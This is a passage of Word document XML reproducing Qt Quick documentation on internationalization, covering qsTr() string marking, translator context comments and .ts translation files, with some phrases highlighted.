            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-internationalization.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="006B69D9" w:rsidRDefault="005211D0" w:rsidP="006B69D9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1100" w:name="_Toc483000764"/>
      <w:bookmarkStart w:id="1101" w:name="_Toc483003762"/>
      <w:bookmarkStart w:id="1102" w:name="_Toc483604116"/>
      <w:bookmarkStart w:id="1103" w:name="_Toc483605336"/>
      <w:r w:rsidRPr="006B69D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Internationalization and Localization with Qt Quick</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1100"/>
      <w:bookmarkEnd w:id="1101"/>
      <w:bookmarkEnd w:id="1102"/>
      <w:bookmarkEnd w:id="1103"/>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="006B69D9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1104" w:name="internationalizing-your-application"/>
      <w:bookmarkStart w:id="1105" w:name="_Toc483000765"/>
      <w:bookmarkStart w:id="1106" w:name="_Toc483003763"/>
      <w:bookmarkStart w:id="1107" w:name="_Toc483604117"/>
      <w:bookmarkStart w:id="1108" w:name="_Toc483605337"/>
      <w:bookmarkEnd w:id="1104"/>
      <w:r w:rsidRPr="006B69D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Internationalizing Your Application</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1105"/>
      <w:bookmarkEnd w:id="1106"/>
      <w:bookmarkEnd w:id="1107"/>
      <w:bookmarkEnd w:id="1108"/>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="36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The following sections describe various aspects of internationalizing your QML source code. If you follow these guides for all the user interface components in your application, it becomes </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>possible to localize every aspect of your application</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>different languages and local cultural conventions</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as the way dates and numbers are formatted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="004A2B67">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1109" w:name="1-use-qstr-for-all-literal-user-interfac"/>
      <w:bookmarkStart w:id="1110" w:name="_Toc483000766"/>
      <w:bookmarkStart w:id="1111" w:name="_Toc483003764"/>
      <w:bookmarkStart w:id="1112" w:name="_Toc483604118"/>
      <w:bookmarkStart w:id="1113" w:name="_Toc483605338"/>
      <w:bookmarkEnd w:id="1109"/>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. Use qsTr() for all Literal User Interface Strings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1110"/>
      <w:bookmarkEnd w:id="1111"/>
      <w:bookmarkEnd w:id="1112"/>
      <w:bookmarkEnd w:id="1113"/>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Strings in QML can be marked for translation using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qsTr</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(), </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qsTranslate</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(), </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qsTrId</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(),</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId675" w:anchor="QT_TR_NOOP" w:history="1">
        <w:r w:rsidRPr="00B16AAB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QT_TR_NOOP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(),</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId676" w:anchor="QT_TRANSLATE_NOOP" w:history="1">
        <w:r w:rsidRPr="00B16AAB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QT_TRANSLATE_NOOP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(), and</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId677" w:anchor="QT_TRID_NOOP" w:history="1">
        <w:r w:rsidRPr="00B16AAB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QT_TRID_NOOP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() functions. The most common way of marking strings is with the qsTr() function. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w: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id</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 xml:space="preserve"> txt1</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="004A2B67" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> qsTr</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Back"</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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This code makes "Back" a key entry in the translation files. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>At runtime, the translation system</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> looks up the keyword "Back" and then gets the corresponding translation value for the current system locale. The result is returned to the</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property and the user interface will show the appropriate translation of "Back" for the current locale.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="004A2B67">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1114" w:name="2-add-context-for-the-translator"/>
      <w:bookmarkStart w:id="1115" w:name="_Toc483000767"/>
      <w:bookmarkStart w:id="1116" w:name="_Toc483003765"/>
      <w:bookmarkStart w:id="1117" w:name="_Toc483604119"/>
      <w:bookmarkStart w:id="1118" w:name="_Toc483605339"/>
      <w:bookmarkEnd w:id="1114"/>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Add Context for the Translator</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1115"/>
      <w:bookmarkEnd w:id="1116"/>
      <w:bookmarkEnd w:id="1117"/>
      <w:bookmarkEnd w:id="1118"/>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="36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User interface strings are often short so you </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>need to help the person translating the text understand the context of the text</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. You can </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">add context information in the source code </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>as extra descriptive text</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> before the string to be translated. These extra descriptions are included in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.ts translation</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> files delivered to the translator.</w:t>
      </w:r>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B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The .ts files are </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> files with the source texts and a place for the translated text. The updated .ts files are </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>converted into binary translation files</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16AAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>included as part of the final application</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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In the following code </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>snippet</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the text on the</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//:</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>line is the main comment for the translator.</w:t>
      </w:r>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5211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The text on the</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//~</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
